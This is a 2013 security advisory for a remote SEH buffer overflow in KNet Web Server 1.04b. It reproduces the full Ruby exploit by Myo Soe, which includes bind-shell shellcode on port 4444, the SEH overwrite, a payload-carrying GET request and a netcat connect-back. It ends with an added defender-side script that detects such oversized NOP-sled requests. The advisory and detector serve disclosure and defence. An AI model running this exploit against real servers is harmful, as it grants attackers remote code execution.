Published: 2013-03-29
Updated: 2013-04-02

Affected systems:
KNet Web Server

Description:
--------------------------------------------------------------------------------
BUGTRAQ ID: 58781

KNet Web Server is a small web server.

KNet 1.04b and other versions contain a remote buffer overflow. Exploiting the flaw overwrites the structured exception handler (SEH) record and binds a shell to port 4444, leading to arbitrary code execution in the context of the application.

<*Source: Myo Soe
  Link: http://packetstormsecurity.com/files/120964/KNet-Web-Server-Buffer-Overflow.html
*>

Test method:
--------------------------------------------------------------------------------
Warning: the following program (method) may be offensive in nature and is provided solely for security research and teaching. Use at your own risk!
#!/usr/bin/ruby
# Exploit Title: KNet Web Server Buffer Overflow SEH
# Date: 2013-03-27
# Exploit Author: Myo Soe, http://yehg.net/
# Software Link: http://www.softpedia.com/progDownload/KNet-Download-20137.html
# Version: KNet 1.04b
# Tested on: Windows 7

require "net/http"
require "uri"
require "socket"

############################################
# bind port 4444
sc_bind =
"\xbd\x0e\x27\x05\xab\xda\xdb\xd9\x74\x24\xf4\x5a\x33\xc9" +
"\xb1\x56\x83\xc2\x04\x31\x6a\x0f\x03\x6a\x01\xc5\xf0\x57" +
"\xf5\x80\xfb\xa7\x05\xf3\x72\x42\x34\x21\xe0\x06\x64\xf5" +
"\x62\x4a\x84\x7e\x26\x7f\x1f\xf2\xef\x70\xa8\xb9\xc9\xbf" +
"\x29\x0c\xd6\x6c\xe9\x0e\xaa\x6e\x3d\xf1\x93\xa0\x30\xf0" +
"\xd4\xdd\xba\xa0\x8d\xaa\x68\x55\xb9\xef\xb0\x54\x6d\x64" +
"\x88\x2e\x08\xbb\x7c\x85\x13\xec\x2c\x92\x5c\x14\x47\xfc" +
"\x7c\x25\x84\x1e\x40\x6c\xa1\xd5\x32\x6f\x63\x24\xba\x41" +
"\x4b\xeb\x85\x6d\x46\xf5\xc2\x4a\xb8\x80\x38\xa9\x45\x93" +
"\xfa\xd3\x91\x16\x1f\x73\x52\x80\xfb\x85\xb7\x57\x8f\x8a" +
"\x7c\x13\xd7\x8e\x83\xf0\x63\xaa\x08\xf7\xa3\x3a\x4a\xdc" +
"\x67\x66\x09\x7d\x31\xc2\xfc\x82\x21\xaa\xa1\x26\x29\x59" +
"\xb6\x51\x70\x36\x7b\x6c\x8b\xc6\x13\xe7\xf8\xf4\xbc\x53" +
"\x97\xb4\x35\x7a\x60\xba\x6c\x3a\xfe\x45\x8e\x3b\xd6\x81" +
"\xda\x6b\x40\x23\x62\xe0\x90\xcc\xb7\xa7\xc0\x62\x67\x08" +
"\xb1\xc2\xd7\xe0\xdb\xcc\x08\x10\xe4\x06\x3f\x16\x2a\x72" +
"\x6c\xf1\x4f\x84\x83\x5d\xd9\x62\xc9\x4d\x8f\x3d\x65\xac" +
"\xf4\xf5\x12\xcf\xde\xa9\x8b\x47\x56\xa4\x0b\x67\x67\xe2" +
"\x38\xc4\xcf\x65\xca\x06\xd4\x94\xcd\x02\x7c\xde\xf6\xc5" +
"\xf6\x8e\xb5\x74\x06\x9b\x2d\x14\x95\x40\xad\x53\x86\xde" +
"\xfa\x34\x78\x17\x6e\xa9\x23\x81\x8c\x30\xb5\xea\x14\xef" +
"\x06\xf4\x95\x62\x32\xd2\x85\xba\xbb\x5e\xf1\x12\xea\x08" +
"\xaf\xd4\x44\xfb\x19\x8f\x3b\x55\xcd\x56\x70\x66\x8b\x56" +
"\x5d\x10\x73\xe6\x08\x65\x8c\xc7\xdc\x61\xf5\x35\x7d\x8d" +
"\x2c\xfe\x8d\xc4\x6c\x57\x06\x81\xe5\xe5\x4b\x32\xd0\x2a" +
"\x72\xb1\xd0\xd2\x81\xa9\x91\xd7\xce\x6d\x4a\xaa\x5f\x18" +
"\x6c\x19\x5f\x09"
###########################################

# Filler up to the SEH record, then the nSEH/SEH overwrite, then the payload
sploit = "\x90" * 1234
sploit += "\xFF\x64\x24\x5C" # nseh | JMP [ESP+5C] FF6424 5C ; will jump to Shell Code at ESP+5C
sploit += "\xE3\x74\x24\x6C" # seh  | Found pop esi - pop ebp - ret at 0x6C2474E3 [crtdll.dll]
sploit += "\x90" * 80
sploit += sc_bind
sploit += "\x90" * 80
########################################

puts "KNet Web Server - Buffer Overflow SEH Exploit\nby Myo Soe, http://yehg.net/\n"

target = ARGV[0]

# Send the whole buffer as the request path of a single GET
def exploit(t, s)
  target = "http://" + t
  sploit = s
  puts "[*] Sending exploit to #{target}...\n"
  url = URI.parse(target)
  res = Net::HTTP.start(url.host, url.port) { |http|
    http.get("/" + sploit)
  }
end

# Connect to the bind shell once the payload has had a moment to run
def connect(t)
  sleep(1)
  target = t
  puts "[*] Opening Shell ..\n"
  system("nc #{target} 4444")
end

t1 = Thread.new { exploit(target, sploit) }
t2 = Thread.new { connect(target) }
t1.join
t2.join

Recommendation:
--------------------------------------------------------------------------------
Vendor patch:

KNet Web Server
---------------
The vendor has not yet released a patch or upgrade. Users of this software are advised to watch the vendor's homepage for the latest version:
http://www.softpedia.com/get/Internet/Servers/WEB-Servers/KNet.shtml
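The exploit above reaches the overflow through a single oversized request-target: about 1.2 KB of 0x90 filler, the four-byte nSEH/SEH overwrite and the payload, all carried in the path of one GET. Until a fix exists, the practical defence is to spot that shape at the edge. The Ruby script below is an added example, not part of this advisory or of Myo Soe's exploit, that classifies raw HTTP request lines (for instance from a capture or a proxy log) by request-target length, runs of 0x90 bytes and non-printable bytes in the path. The thresholds, the helper names and the sample request lines are assumptions constructed for the example.

```ruby
# Added example, not part of the original advisory or the exploit author's code:
# a defender-side check that flags HTTP request lines shaped like the one the
# KNet exploit sends (a very long request-target made mostly of 0x90 filler).
# The thresholds below are assumptions chosen for this example.

MAX_TARGET_LEN = 1024   # legitimate paths on a small web server stay far below this
NOP_SLED_MIN   = 32     # a run of 0x90 this long never appears in a real path
NOP            = 0x90

# Split a raw HTTP request line into its three parts.
# Works on binary (ASCII-8BIT) input so high bytes in the path do not break it.
# Returns nil when the line is not a request line at all.
def parse_request_line(line)
  m = line.b.match(/\A([A-Z]+) (\S+) (HTTP\/\d\.\d)\r?\n?\z/)
  return nil unless m
  { method: m[1], target: m[2], version: m[3] }
end

# Percent-decode a request-target so "%90%90" and raw "\x90\x90" are judged alike.
def percent_decode(target)
  target.b.gsub(/%([0-9A-Fa-f]{2})/) { $1.hex.chr }
end

# Length of the longest run of one byte value in a binary string.
def longest_run(data, byte)
  best = cur = 0
  data.each_byte do |b|
    cur = (b == byte) ? cur + 1 : 0
    best = cur if cur > best
  end
  best
end

# Classify one request line. Returns { verdict: :benign | :suspicious | :malformed,
# reasons: [...] } so the caller can log why a request was flagged.
def analyze_request(line)
  req = parse_request_line(line)
  return { verdict: :malformed, reasons: ["not an HTTP request line"] } unless req

  decoded = percent_decode(req[:target])
  reasons = []

  if decoded.bytesize > MAX_TARGET_LEN
    reasons << "request-target is #{decoded.bytesize} bytes (limit #{MAX_TARGET_LEN})"
  end

  sled = longest_run(decoded, NOP)
  reasons << "run of #{sled} 0x90 bytes looks like a NOP sled" if sled >= NOP_SLED_MIN

  binary = decoded.each_byte.count { |b| b < 0x20 || b > 0x7e }
  reasons << "#{binary} non-printable bytes in the path" if binary > 0

  { verdict: reasons.empty? ? :benign : :suspicious, reasons: reasons }
end

# Constructed sample request lines (not captured from a real system). The second
# and third mirror the exploit's layout: 1234 filler bytes followed by the
# four-byte nSEH/SEH overwrite, once percent-encoded and once as raw bytes.
SAMPLE_REQUESTS = [
  "GET /index.html HTTP/1.1\r\n".b,
  ("GET /" + "%90" * 1234 + "%FF%64%24%5C" + " HTTP/1.1\r\n").b,
  "GET /".b + "\x90".b * 1234 + "\xFF\x64\x24\x5C".b + " HTTP/1.1\r\n".b,
]

if __FILE__ == $PROGRAM_NAME
  SAMPLE_REQUESTS.each do |req|
    r = analyze_request(req)
    puts "#{r[:verdict]}: #{r[:reasons].join('; ')}"
  end
end
```

The length check alone would catch this exploit; the sled and non-printable checks are there so that a shorter variant with a different filler length is still reported, and so the log entry says which property tripped the rule. Percent-decoding before measuring matters because a proxy or log writer may encode the high bytes, which would otherwise hide the 0x90 run.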